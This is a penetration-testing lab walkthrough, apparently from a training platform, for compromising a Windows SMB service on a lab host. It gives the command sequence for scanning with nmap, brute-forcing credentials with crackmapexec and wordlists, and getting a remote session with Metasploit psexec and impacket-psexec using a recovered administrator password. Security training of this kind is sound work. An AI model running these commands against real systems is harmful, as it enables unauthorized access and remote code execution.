Windows: SMB Server PSexec

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Your task is to fingerprint the SMB service using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework. You need to find valid credentials to access the SMB service and abuse the service with available SMB Metasploit exploitation modules.

Objective: Exploit the SMB service to get a meterpreter session on the target and retrieve the flag!

Tools

Metasploit Framework
Nmap

Writeup

nmap -sSVC demo.ine.local

crackmapexec smb demo.ine.local -u /usr/share/wordlists/metasploit/common_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"

Metasploit

msfconsole -q
use exploit/windows/smb/psexec
set rhosts demo.ine.local
set smbuser administrator
set smbpass qwertyuiop
run

Imapcket-psexec

impacket-psexec EC2AMAZ-408S766/administrator:qwertyuiop@demo.ine.local

PreviousWindows: IIS Server: WebDav Metasploit NextWindows: Insecure RDP Service

Last updated 10 days ago